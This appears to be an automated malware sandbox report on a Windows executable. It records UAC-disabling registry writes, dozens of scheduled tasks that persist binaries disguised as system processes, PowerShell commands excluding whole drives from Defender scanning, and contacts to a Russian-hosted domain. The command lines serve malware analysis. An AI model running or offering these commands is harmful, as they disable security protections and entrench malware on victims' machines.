| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| N/A | N/A | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| N/A | N/A | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Uninstall Information\spoolsv.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe
"C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 8 /tr "'C:\Users\Public\taskhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 5 /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\W2tbEWSDqo.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe
"C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Windows\Setup\State\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Setup\State\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\Setup\State\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Windows\Cursors\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Windows\Cursors\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Windows\Cursors\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 5 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\OSPPSVC.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\OSPPSVC.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 14 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\OSPPSVC.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Windows\IME\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\IME\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Windows\IME\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca1" /sc MINUTE /mo 11 /tr "'C:\Program Files\Internet Explorer\de-DE\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\de-DE\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca1" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\de-DE\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Office\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Office\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Users\Default\AppData\Roaming\explorer.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Users\Default\AppData\Roaming\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\en-US\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\en-US\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Mail\en-US\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Uninstall Information\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Windows\TAPI\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\TAPI\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Windows\TAPI\csrss.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "20272816811517310018-1390373246-1608324919-1314573328-1585965784-1244662269799342459"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\q3rpLXaa8e.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Uninstall Information\spoolsv.exe
"C:\Program Files\Uninstall Information\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\608a7d24-9261-4483-abdc-de1817c1c715.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6531a927-b2aa-4c94-8cf8-f037baacc273.vbs"
C:\Program Files\Uninstall Information\spoolsv.exe
"C:\Program Files\Uninstall Information\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0d141fdb-af58-4a20-b467-6e47f0dad324.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3918262b-3937-44e7-af1c-f1fe2becc0ef.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | a0889572.xsph.ru | udp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
Files
memory/1668-0-0x000007FEF5EF3000-0x000007FEF5EF4000-memory.dmp
memory/1668-1-0x0000000001180000-0x0000000001A78000-memory.dmp
